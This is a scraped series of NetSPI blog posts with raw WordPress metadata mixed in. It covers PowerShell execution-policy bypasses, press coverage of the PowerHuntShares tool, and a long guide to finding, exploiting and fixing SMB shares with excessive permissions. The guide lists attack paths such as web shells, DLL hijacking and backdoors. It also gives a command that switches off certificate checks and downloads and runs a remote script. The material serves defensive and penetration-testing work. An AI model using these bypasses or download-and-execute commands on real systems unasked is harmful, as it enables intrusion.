As we saw in the introduction, the execution policy can be applied at many levels. This includes the process which you have control over. Using this technique the execution policy can be set to unrestricted for the duration of your Session. Also, it does not result in a configuration change, or require writing to the disk.

Set-ExecutionPolicy Bypass -Scope Process
Powershell Bypass - Set the ExcutionPolicy

14. Set the ExcutionPolicy for the CurrentUser Scope via Command

This option is similar to the process scope, but applies the setting to the current user's environment persistently by modifying a registry key. Also, it does not result in a configuration change, or require writing to the disk.

Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
CurrentUser Scope via the

15. Set the ExcutionPolicy for the CurrentUser Scope via the Registry

In this example I've shown how to change the execution policy for the current user's environment persistently by modifying a registry key directly.

HKEY_CURRENT_USER\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
Powershell Bypass – Folder Structure

Wrap Up Summary

I think the theme here is that the execution policy doesn’t have to be a hurdle for developers, admins, or penetration testing. Microsoft never intended it to be a security control. Which is why there are so many options for bypassing it. Microsoft was nice enough to provide some native options and the security community has also come up with some really fun tricks. Thanks to all of those people who have contributed through blogs and presentations. To the rest, good luck in all your PowerShell adventures and don't forget to hack responsibly. ;)

Looking for a strategic partner to critically test your Windows systems? Explore NetSPI’s network penetration testing services.

References

[post_title] => 15 Ways to Bypass the PowerShell Execution Policy [post_excerpt] => By default, PowerShell is configured to prevent the execution of PowerShell scripts on Windows systems. In this blog I’ll cover 15 ways to bypass the PowerShell execution policy without having local administrator rights on the system. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => 15-ways-to-bypass-the-powershell-execution-policy [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:09:58 [post_modified_gmt] => 2023-01-23 21:09:58 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1107 [menu_order] => 44 [post_type] => post [post_mime_type] => [comment_count] => 23 [filter] => raw ) [6] => WP_Post Object ( [ID] => 28916 [post_author] => 17 [post_date] => 2022-11-29 15:15:00 [post_date_gmt] => 2022-11-29 21:15:00 [post_content] =>

On November 29, both Vice President of Research, Scott Sutherland and Nick Landers, were featured in the VMblog article called 18 Security Leaders Come Together to Share Their 2023 Predictions. Read the preview below or view it online.

+++

What will the New Year bring in cyberspace? Here's a roundup of some of the top security industry forecasts, trends and cybersecurity predictions for 2023. Where do things go from here?

Read on as 18 industry leaders in the security space come together to provide their insights into how the cybersecurity industry will shake out in 2023.

NetSPI: Scott Sutherland, VP of Research - Can DTL Help Stop Software Supply Chain Attacks? 

"Adoption of distributed ledger technology (DTL) is still in its infancy and we'll see some interesting use cases gain momentum in 2023. DLT can basically be used as a database that enforces security through cryptographic keys and signatures. Since the stored data is immutable, DTL can be used anytime you need a high integrity source of truth. That comes in handy when trying to ensure the security of open-source projects (and maybe some commercial ones). Over the last few years, there have been several "supply chain compromises'' that boil down to an unauthorized code submission. In response to those attacks, many software providers have started to bake more security reviews and audit controls into their SDLC process. Additionally, the companies consuming software have beefed up their requirements for adopting/deploying 3rd party software in their environment. However neither really solves the core issue, which is that anyone with administrative access to the systems hosting the code repository can bypass the intended controls. DLT could be a solution to that problem."

+++

NetSPI: Nick Landers, VP of Research - By the end of next year every major financial institution will have announced adoption of Blockchain technology

"There is a notable trend of Blockchain adoption in large financial institutions. The primary focus is custodial offerings of digital assets, and private chains to maintain and execute trading contracts. The business use cases for Blockchain technology will deviate starkly from popularized tokens and NFTs. Instead, industries will prioritize private chains to accelerate business logic, digital asset ownership on behalf of customers, and institutional investment in Proof of Stake chains. 

By the end of next year, I would expect every major financial institution will have announced adoption of Blockchain technology, if they haven't already. Nuanced technologies like Hyperledger Fabric have received much less security research than Ethereum, EVM, and Solidity-based smart contracts.Additionally, the supported features in business-focused private chain technologies differ significantly from their public counterparts. This ultimately means more attack surface, more potential configuration mistakes, and more required training for development teams. If you thought that blockchain was "secure by default", think again. Just like cloud platform adoption, the promises of "secure by default" will fall away as unique attack paths and vulnerabilities are discovered in the nuances of this tech."

You can read the full article at VMblog!

[post_title] => VMBlog: 18 Security Leaders Come Together to Share Their 2023 Predictions [post_excerpt] => On November 29, VPs of Research, Scott Sutherland and Nick Landers, were featured in the VMblog article called 18 Security Leaders Come Together to Share Their 2023 Predictions. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => vmblog-security-leaders-share-2023-predictions [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:01 [post_modified_gmt] => 2023-01-23 21:10:01 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28916 [menu_order] => 51 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [7] => WP_Post Object ( [ID] => 28201 [post_author] => 17 [post_date] => 2022-08-10 16:32:00 [post_date_gmt] => 2022-08-10 21:32:00 [post_content] =>

On August 10, NetSPI Senior Director Scott Sutherland was featured in the Dark Reading article called New Open Source Tools Launched for Adversary Simulation. Read the preview below or view it online.

+++

Network shares in Active Directory environments configured with excessive permissions pose serious risks to the enterprise in the form of data exposure, privilege escalation, and ransomware attacks. Two new open source adversary simulation tools PowerHuntShares and PowerHunt help enterprise defenders discover vulnerable network shares and manage the attack surface.

The tools will help defense, identity and access management (IAM), and security operations center (SOC) teams streamline share hunting and remediation of excessive SMB share permissions in Active Directory environments, NetSPI's senior director Scott Sutherland wrote on the company blog. Sutherland developed these tools.

PowerHuntShares inventories, analyzes, and reports excessive privilege assigned to SMB shares on Active Directory domain joined computers. The PowerHuntShares tool addresses the risks of excessive share permissions in Active Directory environments that can lead to data exposure, privilege escalation, and ransomware attacks within enterprise environments.

"PowerHuntShares will inventory SMB share ACLs configured with 'excessive privileges' and highlight 'high risk' ACLs [access control lists]," Sutherland wrote.

PowerHunt, a modular threat hunting framework, identifies signs of compromise based on artifacts from common MITRE ATT&CK techniques and detects anomalies and outliers specific to the target environment. The tool automates the collection of artifacts at scale using PowerShell remoting and perform initial analysis. 

You can read the full article at Dark Reading!

[post_title] => Dark Reading: New Open Source Tools Launched for Adversary Simulation [post_excerpt] => On August 10, NetSPI Senior Director Scott Sutherland was featured in the Dark Reading article called New Open Source Tools Launched for Adversary Simulation. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => dark-reading-open-source-tools-for-adversary-simulation [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:21 [post_modified_gmt] => 2023-01-23 21:10:21 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28201 [menu_order] => 100 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [8] => WP_Post Object ( [ID] => 28194 [post_author] => 17 [post_date] => 2022-08-10 12:56:00 [post_date_gmt] => 2022-08-10 17:56:00 [post_content] =>

On August 10, NetSPI Senior Director Scott Sutherland was featured in the Open Source For You article called New Open Source Tools From NetSPI Address Information Security Issues. Read the preview below or view it online.

+++

Two new open source solutions for identity and access management (IAM) and security operations centre (SOC) groups have been made available by NetSPI, a business that specialises in enterprise penetration testing and attack surface management. Information security teams will benefit from these tools, PowerHuntShares and PowerHunt, which will help them find weak network shares and enhance detections in general.

PowerHuntShares intends to lessen the problems created by excessive powers in corporate systems, such as data disclosure, privilege escalation, and ransomware assaults. On Active Directory domain-joined PCs, the programme detects, examines, and reports excessive share permissions linked to their respective SMB shares.

A modular threat hunting platform called PowerHunt finds dangers in a variety of target contexts as well as targets-specific oddities and outliers. This detection is based on artefacts from popular MITRE ATT&CK techniques. The collecting of these artefacts is automated using PowerShell remoting, and initial analysis is then performed. Along with other tools and procedures, PowerHunt also creates simple-to-use.csv files for improved triage and analysis.

“I’m proud to work for an organization that understands the importance of open-source tool development and encourages innovation through collaboration,” said Scott Sutherland, senior director at NetSPI. “I urge the security community to check out and contribute to these tools so we can better understand our SMB share attack surfaces and improve strategies for remediation, together.”

[post_title] => Open Source For You: New Open Source Tools From NetSPI Address Information Security Issues [post_excerpt] => On August 10, NetSPI Senior Director Scott Sutherland was featured in the Open Source For You article called New Open Source Tools From NetSPI Address Information Security Issues. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => open-source-for-you-new-open-source-tools-address-information-security-issues [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:21 [post_modified_gmt] => 2023-01-23 21:10:21 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28194 [menu_order] => 101 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [9] => WP_Post Object ( [ID] => 28195 [post_author] => 17 [post_date] => 2022-08-10 09:28:00 [post_date_gmt] => 2022-08-10 14:28:00 [post_content] =>

On August 10, NetSPI Senior Director Scott Sutherland was featured in the Help Net Security article called NetSPI unveils two open-source tools to assist defence teams in uncovering vulnerable network shares. Read the preview below or view it online.

+++

At Black Hat USA 2022NetSPI has unveiled two new open-source tools for the information security community: PowerHuntShares and PowerHunt.

These new adversary simulation tools were developed by NetSPI’s Senior Director, Scott Sutherland, to help defense, identity and access management (IAM), and security operations center (SOC) teams discover vulnerable network shares and improve detections.

  • PowerHuntShares inventories, analyzes, and reports excessive privilege assigned to SMB shares on Active Directory domain joined computers. This capability helps address the risks of excessive share permissions in Active Directory environments that can lead to data exposure, privilege escalation, and ransomware attacks within enterprise environments.
  • PowerHunt, a modular threat hunting framework, identifies signs of compromise based on artifacts from common MITRE ATT&CK techniques and detects anomalies and outliers specific to the target environment. PowerHunt automates the collection of artifacts at scale using PowerShell remoting and perform initial analysis. It can also output easy to consume .csv files so that additional triage and analysis can be done using other tools and processes.

“I’m proud to work for an organization that understands the importance of open-source tool development and encourages innovation through collaboration,” said Scott. “I urge the security community to check out and contribute to these tools so we can better understand our SMB share attack surfaces and improve strategies for remediation, together.”

[post_title] => Help Net Security: NetSPI unveils two open-source tools to assist defence teams in uncovering vulnerable network shares [post_excerpt] => On August 10, NetSPI Senior Director Scott Sutherland was featured in the Help Net Security article called NetSPI unveils two open-source tools to assist defence teams in uncovering vulnerable network shares. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => help-net-security-open-source-tools [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:22 [post_modified_gmt] => 2023-01-23 21:10:22 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28195 [menu_order] => 102 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [10] => WP_Post Object ( [ID] => 28196 [post_author] => 17 [post_date] => 2022-08-09 13:06:00 [post_date_gmt] => 2022-08-09 18:06:00 [post_content] =>

On August 9, NetSPI Senior Director Scott Sutherland was featured in the Database Trends and Applications article called NetSPI’s Latest Open-Source Tools Confront Information Security Issues. Read the preview below or view it online.

+++

NetSPI, an enterprise penetration testing and attack surface management company, is releasing two new open-source tools for identity and access management (IAM) and security operations center (SOC) groups. These tools, PowerHuntShares and PowerHunt, will aid information security teams discover vulnerable network shares and improve detections overall.

PowerHuntShares aims to elevate the pains of data exposure, privilege escalation, and ransomware attacks in company systems caused by excessive privileges. The tool inventories, analyzes, and reports excessive share permissions associated with their respective SMB shares on Active Directory domain joined computers.

PowerHunt is a modular threat hunting framework that locates risks across target environments, as well as identifies target-specific anomalies and outliers. This detection is based on artifacts from prevalent MITRE ATT&CK techniques, whose collection is automated using PowerShell remoting and perform initial analysis. PowerHunt also produces easy to consume .csv files for increased triage and analysis, among other tools and processes.

“I’m proud to work for an organization that understands the importance of open-source tool development and encourages innovation through collaboration,” said Scott Sutherland, senior director at NetSPI. “I urge the security community to check out and contribute to these tools so we can better understand our SMB share attack surfaces and improve strategies for remediation, together.”

For more information, please visit https://www.netspi.com/.

[post_title] => Database Trends and Applications: NetSPI’s Latest Open-Source Tools Confront Information Security Issues [post_excerpt] => On August 9, NetSPI Senior Director Scott Sutherland was featured in the Database Trends and Applications called NetSPI’s Latest Open-Source Tools Confront Information Security Issues. Read the preview below or view it online. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => open-source-tools-confront-information-security-issues [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:22 [post_modified_gmt] => 2023-01-23 21:10:22 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28196 [menu_order] => 104 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [11] => WP_Post Object ( [ID] => 28193 [post_author] => 17 [post_date] => 2022-08-09 12:21:00 [post_date_gmt] => 2022-08-09 17:21:00 [post_content] =>

On August 9, NetSPI Senior Director Scott Sutherland was featured in the VentureBeat article called NetSPI rolls out 2 new open-source pen-testing tools at Black Hat. Read the preview below or view it online.

+++

Preventing and mitigating cyberattacks is a day-to-day — sometimes hour-to-hour — is a massive endeavor for enterprises. New, more advanced techniques are revealed constantly, especially with the rise in ransomware-as-a-service, crime syndicates and cybercrime commoditization. Likewise, statistics are seemingly endless, with a regular churn of new, updated reports and research studies revealing worsening conditions. 

According to Fortune Business Insights, the worldwide information security market will reach just around $376 billion in 2029. And, IBM research revealed that the average cost of a data breach is $4.35 million.

The harsh truth is that many organizations are exposed due to common software, hardware or organizational process vulnerabilities — and 93% of all networks are open to breaches, according to another recent report

Cybersecurity must therefore be a team effort, said Scott Sutherland, senior director at NetSPI, which specializes in enterprise penetration testing and attack-surface management. 

New open-source discovery and remediation tools

The company today announced the release of two new open-source tools for the information security community: PowerHuntShares and PowerHunt. Sutherland is demoing both at Black Hat USA this week. 

These new tools are aimed at helping defense, identity and access management (IAM) and security operations center (SOC) teams discover vulnerable network shares and improve detections, said Sutherland. 

They have been developed — and released in an open-source capacity — to “help ensure our penetration testers and the IT community can more effectively identify and remediate excessive share permissions that are being abused by bad actors like ransomware groups,” said Sutherland. 

He added, “They can be used as part of a regular quarterly cadence, but the hope is they’ll be a starting point for companies that lacked awareness around these issues before the tools were released.” 

Vulnerabilities revealed (by the good guys)

The new PowerHuntShares capability inventories, analyzes and reports excessive privilege assigned to server message block (SMB) shares on Microsoft’s Active Directory (AD) domain-joined computers. 

SMB allows applications on a computer to read and write to files and to request services from server programs in a computer network.

NetSPI’s new tool helps address risks of excessive share permissions in AD environments that can lead to data exposure, privilege escalation and ransomware attacks within enterprise environments, explained Sutherland. 

“PowerHuntShares is focused on identifying shares configured with excessive permissions and providing data insight to understand how they are related to each other, when they were introduced into the environment, who owns them and how exploitable they are,” said Sutherland. 

For instance, according to a recent study from cybersecurity company ExtraHop, SMB was the most prevalent protocol exposed in many industries: 34 out of 10,000 devices in financial services; seven out of 10,000 devices in healthcare; and five out of 10,000 devices in state, local and education (SLED).

You can read the full article at VentureBeat!

[post_title] => VentureBeat: NetSPI rolls out 2 new open-source pen-testing tools at Black Hat [post_excerpt] => On August 9, NetSPI Senior Director Scott Sutherland was featured in the VentureBeat article called NetSPI rolls out 2 new open-source pen-testing tools at Black Hat. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => venturebeat-new-open-source-pentesting-tools [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:23 [post_modified_gmt] => 2023-01-23 21:10:23 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28193 [menu_order] => 105 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [12] => WP_Post Object ( [ID] => 28175 [post_author] => 17 [post_date] => 2022-08-09 08:00:00 [post_date_gmt] => 2022-08-09 13:00:00 [post_content] =>

Introduction 

In this blog, I’ll explain how to quickly inventory, exploit, and remediate network shares configured with excessive permissions at scale in Active Directory environments. Excessive share permissions represent a risk that can lead to data exposure, privilege escalation, and ransomware attacks within enterprise environments. So, I’ll also be exploring why network shares configured with excessive permissions are still plaguing most environments after 20 years of mainstream vulnerability management and penetration testing.

Finally, I’ll share a new open-source tool called PowerHuntShares that can help streamline share hunting and remediation of excessive SMB share permissions in Active Directory environments. This content is also available in a presentation format here. Or, if you’d like to hear me talk about this topic, check out our webinar, How to Evaluate Active Directory SMB Shares at Scale.

This should be interesting to people responsible for managing network share access in Active Directory environments (Identity and access management/IAM teams) and the red team/penetration testers tasked with exploiting that access. 

TLDR; We can leverage Active Directory to help create an inventory of systems and shares. Shares configured with excessive permissions can lead to remote code execution (RCE) in a variety of ways, remediation efforts can be expedited through simple data grouping techniques, and malicious share scanning can be detected with a few common event IDs and a little correlation (always easier said than done).

Table of Contents: 

The Problem(s)
Network Share Permissions Inheritance Blind Spots
Network Share Inventory
Network Share Exploitation
Network Share Remediation
Introducing PowerHuntShares
Wrap Up

The Problem(s) 

If only it were just one problem. I don’t know a penetration tester that doesn’t have a war story involving unauthorized network share access. In the real world, that story typically ends with the deployment of ransomware and double extortion. That’s why it’s important we try to understand some of the root causes behind this issue. Below is a summary of the root causes that often lead to massive network share exposure in most Active Directory environments. 

Broken Asset Management 

Tracking live systems in enterprise environments is difficult and tracking an ever-changing share inventory and owners is even more difficult. Even if the Identity and Access Management (IAM) team finds a network share through discovery, it begs the questions:

  1. Who owns it?
  2. What applications or business processes does it support?
  3. Can we remove high risk Access Control Entries (ACE)?
  4. Can we remove the share all together?

Most of those questions can be answered if you have a functioning Configuration Management Database (CMDB). Unfortunately, not everyone does.

Broken Vulnerability Management 

Many vulnerability management programs were never built to identify network share configurations that provide unauthorized access to authenticated domain users. Much of their focus has been on identifying classic vulnerabilities (missing patches, weak passwords, and application issues) and prioritizing efforts around vulnerabilities that don’t require authentication, which is of course not all bad.

However, based on my observations, the industry has only taken a deep interest in the Active Directory ecosystem in the last five years. This seems to be largely due to increased exposure and awareness of Active Directory (AD) attacks which are heavily dependent on configurations and not missing patches.

I’m also not saying IAM teams haven’t been working hard to do their jobs, but in many cases, they get bogged down in what equates to group management and forget to (or don’t have time to) look at the actual assets that global/common groups have access to. That is a deep well, but today’s focus is on the network shares.

Penetration testers have always known shares are a risk, but implementing, managing, and evaluating least privilege in Active Directory environments is a non-trivial challenge. Even with increased interest in the security community, very few solutions can effectively inventory and evaluate share access for an entire Active Directory domain (or multiple domains). 

Based on my experience, very few organizations perform authenticated vulnerability scans to begin with, but even those that do seem to lack findings for common excessive privileges, inherited permissions, and distilled summary data for the environment that provides the insights that most IAM teams need to make good decisions. There has been an overreliance on those types of tools for a long time because many companies have the impression that they provide more coverage than they do regarding network share permissions. 

In short, good asset inventory and attack surface management paves the way for better vulnerability management coverage – and many companies aren’t quite there yet. 

Not Considering Segmentation Boundaries 

Most large environments have host, network, and Active Directory domain boundaries that need to be considered when performing any type of authenticated scanning or agent deployment. Companies trying to accurately inventory and evaluate network shares often miss things because they do not consider the boundaries isolating their assets. Make sure to work within those boundaries when evaluating assets. 

The Cloud is Here!

The cloud is here, and it supports all kinds of fantastic file storage mediums, but that doesn’t mean that on premise network shares disappear. Companies need to make sure they are still looking backward as they continue to look forward regarding security controls on file shares. For many companies, it may be the better part of a decade before they can migrate the bulk of their file storage infrastructure into their favorite floating mass of condensed water vapor – you know, the cloud. 😜

Misunderstanding NTFS and Share Permissions 

There are a lot of bad practices related to share permission management that have gotten absorbed into IT culture over the years simply because people don’t understand how they work. One of the biggest contributors to excessive share permissions is privilege inheritance through native nested group memberships. This issue is not limited to network shares either. We have been abusing the same privilege inheritance issues for over a decade to get access to SQL Server Instances. In the next sections, I’ll provide an overview of the issue and how it can be exploited in the context of network shares.

Network Share Permissions Inheritance Blind Spots 

A network share is just a medium for making local files available to remote users on the network, but two sets of permissions control a remote user’s access to the shared files. To understand the privilege inheritance problem, it helps to do a quick refresher on how NTFS and share permissions work together on Windows systems. Let’s explore the basics. 

NTFS Permissions 

  • Used to control access to the local NTFS file system 
  • Can affect local and remote users 

Share Permissions 

  • Used to control access to shared files and folders 
  • Only affects remote users 

In short, from a remote user perspective, network share permissions (remote) are reviewed first, then NTFS permissions (local) are reviewed second, but the most restrictive permission always wins regardless. Below is a simple example showing that John has Full Control permissions on the share, but only Read permissions on the associated local folder. Most restrictive wins, so John is only provided read access to the files made available remotely through the shared folder.

A diagram of NTFS Permissions and Share Permissions showcasing that the most restrictive permission wins.

So those are the basics. The big idea being that the most restrictive ACL wins. However, there are some nuances that have to do with local groups that inherit Domain Groups. To get our heads around that, let’s touch briefly on the affected local groups. 

Everyone

The everyone group provides all authenticated and anonymous users with access in most configurations. This group is overused in many environments and often results in excessive privilege. 

Builtin\Users 

New local users are added to it by default. When the system is not joined to a domain it operates as you would expect it to. 

Authenticated Users

This group is nested in the Builtin\Users group. When a system is not joined to the domain, it doesn’t do much in the way of influencing access. However, when a system is joined to an Active Directory domain, Authenticated Users implicitly includes the “Domain Users” and “Domain Computers” groups. For example, an IT administrator may think they’re only providing remote share access to the Builtin\Users group, when in fact they are giving it to everyone on the domain. Below is a diagram to help illustrates this scenario.

Builtin\Users group includes Domain Users when domain joined.

The lesson here is that a small misunderstanding around local and domain group relationships can lead to unauthorized access and potential risk. The next section will cover how to inventory shares and their Access-Control Lists (ACLs) so we can target and remediate them.

Network Share Inventory 

As it turns out, getting a quick inventory of your domain computers and associated shares isn’t that hard thanks to several native and open-source tools. The trick is to grab enough information to answer those who, what, where, when, and how questions needed for remediation efforts.
The discovery of shares and permissions boils down to a few basic steps: 

  1. Query Active Directory via Lightweight Directory Access Protocol (LDAP) to get a list of domain computers. PowerShell commands like Get-AdComputer (Active Directory PowerShell Module) and Get-DomainComputer (PowerSploit) can help a lot there.
  2. Confirm connectivity to those computers on TCP port 445. Nmap is a free and easy-to-use tool for this purpose. There are also several open-source TCP port scanning scripts out there if you want to stick with PowerShell.
  3. Query for shares, share permissions, and other information using your preferred method. PowerShell tools like Get-SMBShare, Get-SmbShareAccess, Get-ACL, and Get-ObjectAcl (PowerSploit) are quite helpful.
  4. Other information that will help remediation efforts later includes the folder owner, file count, file listing, file listing hash, and computer IP address. You may also find some of that information in your company’s CMDB. PowerShell commands like Get-ChildItem and Resolve-DnsNameSome can also help gather some of that information.

PowerHuntShares can be used to automate the tasks above (covered in the last section), but regardless of what you use for discovery, understanding how unauthorized share access can be abused will help your team prioritize remediation efforts.

Network Share Exploitation 

Network shares configured with excessive permissions can be exploited in several ways, but the nature of the share and specific share permissions will ultimately dictate which attacks can be executed. Below, I’ve provided an overview of some of the most common attacks that leverage read and write access to shares to help get you started. 

Read Access Abuse 

Ransomware and other threat actors often leverage excessive read permissions on shares to access sensitive data like Personal Identifiable Information (PII) or intellectual property (source code, engineering designs, investment strategies, proprietary formulas, acquisition information, etc.) that they can exploit, sell, or extort your company with. Additionally, we have found during penetration tests that passwords are commonly stored in cleartext and can be used to log into databases and servers. This means that in some cases, read access to a share can end in RCE.

Below is a simple example of how excessive read access to a network share can result in RCE: 

  1. The attacker compromises a domain user.
  2. The attacker identifies a shared folder for a web root, code backup, or dev ops directory.
  3. The attacker identifies passwords (often database connection strings) stored in cleartext.
  4. The attacker uses the database password to connect to the database server.
  5. The attacker uses the native database functionality to obtain local administrative privileges to the database server’s operating system.
  6. The attacker leverages shared database service account to access other database servers. 

Below is a simple illustration of that process: 

A 6-step process of how excessive read access to a network share can result in remote code execution (RCE).

Write Access Abuse 

Write access provides all the benefits of read access with the bonus of being able to add, remove, modify, and encrypt files (like Ransomware threat actors). Write access also offers more potential to turn share access into RCE. Below is a list of ten of the more common RCE options: 

  1. Write a web shell to a web root folder, which can be accessed via the web server.
  2. Replace or modify application EXE and DLL files to include a backdoor.
  3. Write EXE or DLL files to paths used by applications and services that are unquoted.
  4. Write a DLL to application folders to perform DLL hijacking. You can use Koppeling, written by NetSPI’s very own Director of Research Nick Landers.
  5. Write a DLL and config file to application folders to perform appdomain hijacking for .net applications.
  6. Write an executable or script to the “All Users” Startup folder to launch them at the next logon.
  7. Modify files executed by scheduled tasks.
  8. Modify the PowerShell startup profile to include a backdoor.
  9. Modify Microsoft office templates to include a backdoor.
  10. Write a malicious LNK file to capture or relay the NetNTLM hashes. 

You may have noticed that many of the techniques I listed are also commonly used for persistence and lateral movement, which is a great reminder that old techniques can have more than one use case. 

Below is a simple diagram that attempts to illustrate the basic web shell example.

  1. The attacker compromises a domain user.
  2. The attacker scans for shares, finds a wwwroot directory, and uploads a web shell. The wwwroot directory stores all the files used by the web application hosted on the target IIS server. So, you can think of the web shell as something that extends the functionality of the published web application.
  3. Using a standard web browser, the attacker can now access the uploaded web shell file hosted by the target IIS web server.
  4. The attacker uses the web shell access to execute commands on the operating systems as the web server service account.
  5. The web server service account may have additional privileges to access other resources on the network.
A 5-step diagram showing RCE using a web shell.

Below is another simplified diagram showing the generic steps that can be used to execute the attacks from my top 10 list. Let’s pay attention to the C$ share being abused. The C$ share is a default hidden share in Windows that should not be accessible to standard domain users. It maps to the C drive, which typically includes all the files on the system. Unfortunately, devOops, application deployments, and single user misconfigurations accidentally (or intently) make the C$ share available to all domain users in more environments than you might think. During our penetration test, we perform full SMB share audits for domain joined systems, and we have found that we end up with write access to a C$ share more than half the time.

A simplified diagram based on the list of 10 common remote code execution (RCE) options.

Network Share Remediation 

Tracking down system owners, applications, and valid business cases during excessive share remediation efforts can be a huge pain for IAM teams. For a large business, it can mean sorting through hundreds of thousands of share ACLs. So having ways to group and prioritize shares during that effort can be a huge time saver. 

I’ve found that the trick to successful grouping is collecting the right data. To determine what data to collect, I ask myself the standard who, what, where, when, and how questions and then determine where I may be able to get that data from there. 

What shares are exposed? 

  • Share Name: Sometimes, the share name alone can indicate the type of data exposed including high risk shares like C$, ADMIN$, and wwwroot.
  • Share File Count: Directories with no files can be a way to prioritize share remediation when you may be trying to prioritize high-risk shares first.
  • Directory List: Similar to share name, the folders and files in a shared directory can often tell you a lot about context.
  • Directory List Hash: This is simply a hash of the directory listing. While not a hard requirement, it can make identifying and comparing directory listing that are the same a little easier. 

Who has access to them? 

  • Share ACL: This will help show what access users have and can be filtered for known high-risk groups or large internal groups.
  • NTFS ACL: This will help show what access users have and can be filtered for known high-risk groups or large internal groups. 

When were they created? 

  • Folder Creation Date: Grouping or clustering creation dates on a timeline can reveal trends that can be tied to business units, applications, and processes that may have introduced excessive share privileges in the past. 

Who created them? 

  • Folder Owner: The folder owner can sometimes lead you to the department or business unit that owns the system, application, or process that created/uses the share.
  • Hostname: Hostname can indicate location and ownership if standardized naming conventions are used. 

Where are they? 

  • Computer Name: The computer name that the hosts share can often be used to determine a lot of information like department and location if a standardized naming convention is used.
  • IP Address: Similar to computer names, subnets are also commonly allocated to computers that do specific things. In many environments, that allocation is documented in Active Directory and can be cross referenced. 

If we collect all of that information during discovery, we can use it to perform grouping based on share name, owner, subnet, folder list, and folder list hash so we can identify large chunks of related shares that can be remediated at once. Don’t want to write the code for that yourself? I wrote PowerHuntShares to help you out.

Introducing PowerHuntShares 

PowerHuntShares is designed to automatically inventory, analyze, and report excessive privilege assigned to SMB shares on Active Directory domain joined computers. It is intended to be used by IAM and other security teams to gain a better understanding of their SMB Share attack surface and provide data insights to help group and prioritize share remediation efforts. Below is a quick guide to PowerHuntShares setup, execution (collection & analysis), and reporting. 

Setup 

1. Download the project from https://github.com/NetSPI/Powerhuntshares.

2. From a non-domain system you can load it with the following command:

runas /netonly /user:domain\user PowerShell.exe 
Set-ExecutionPolicy bypass -scope process
Import-Module Invoke-HuntSMBShares.ps1 

Alternatively, you can load it directly from the internet using the following PowerShell script. 

[System.Net.ServicePointManager]::ServerCertificateValidation
Callback = {$true} 

[Net.ServicePointManager]::SecurityProtocol =[Net.Security
ProtocolType]::Tls12 

 
IEX(New-Object System.Net.WebClient).DownloadString
("https://raw.githubusercontent.com/NetSPI/
PowerHuntShares/main/PowerHuntShares.psm1") 

Collection

The Invoke-HuntSMBShares collection function wraps a few modified functions from PowerView and Invoke-Parallel. The modifications grab additional information, automate common task sequences, and generate summary data for the reports. Regardless, a big shout out for the nice work done by Warren F. and Will Schroeder (however long ago). Below are some command examples. 

Run from domain joined system 
Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test
Run from a non-domain joined system
runas /netonly /user:domain\user PowerShell.exe
Invoke-HuntSMBShares -Threads 100 -RunSpaceTimeOut 10` 
-OutputDirectory c:\folder\`
-DomainController 10.1.1.1` 
-Credential domain\user
=============================================================== 
PowerHuntShares
=============================================================== 
 This function automates the following tasks:

 o Determine current computer's domain
 o Enumerate domain computers
 o Filter for computers that respond to ping requests
 o Filter for computers that have TCP 445 open and accessible
 o Enumerate SMB shares
 o Enumerate SMB share permissions
 o Identify shares with potentially excessive privileges
 o Identify shares that provide reads & write access
 o Identify shares that are high risk
 o Identify common share owners, names, & directory listings
 o Generate creation, last written, & last accessed timelines
 o Generate html summary report and detailed csv files

 Note: This can take hours to run in large environments.
---------------------------------------------------------------
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
---------------------------------------------------------------
SHARE DISCOVERY
--------------------------------------------------------------- 
[*][03/01/2021 09:35] Scan Start
[*][03/01/2021 09:35] Output Directory: c:\temp\smbshares\SmbShareHunt-03012021093504
[*][03/01/2021 09:35] Successful connection to domain controller: dc1.demo.local
[*][03/01/2021 09:35] Performing LDAP query for computers associated with the demo.local domain
[*][03/01/2021 09:35] - 245 computers found
[*][03/01/2021 09:35] Pinging 245 computers
[*][03/01/2021 09:35] - 55 computers responded to ping requests.
[*][03/01/2021 09:35] Checking if TCP Port 445 is open on 55 computers
[*][03/01/2021 09:36] - 49 computers have TCP port 445 open.
[*][03/01/2021 09:36] Getting a list of SMB shares from 49 computers
[*][03/01/2021 09:36] - 217 SMB shares were found.
[*][03/01/2021 09:36] Getting share permissions from 217 SMB shares
[*][03/01/2021 09:37] - 374 share permissions were enumerated.
[*][03/01/2021 09:37] Getting directory listings from 33 SMB shares
[*][03/01/2021 09:37] - Targeting up to 3 nested directory levels
[*][03/01/2021 09:37] - 563 files and folders were enumerated.
[*][03/01/2021 09:37] Identifying potentially excessive share permissions
[*][03/01/2021 09:37] - 33 potentially excessive privileges were found across 12 systems.
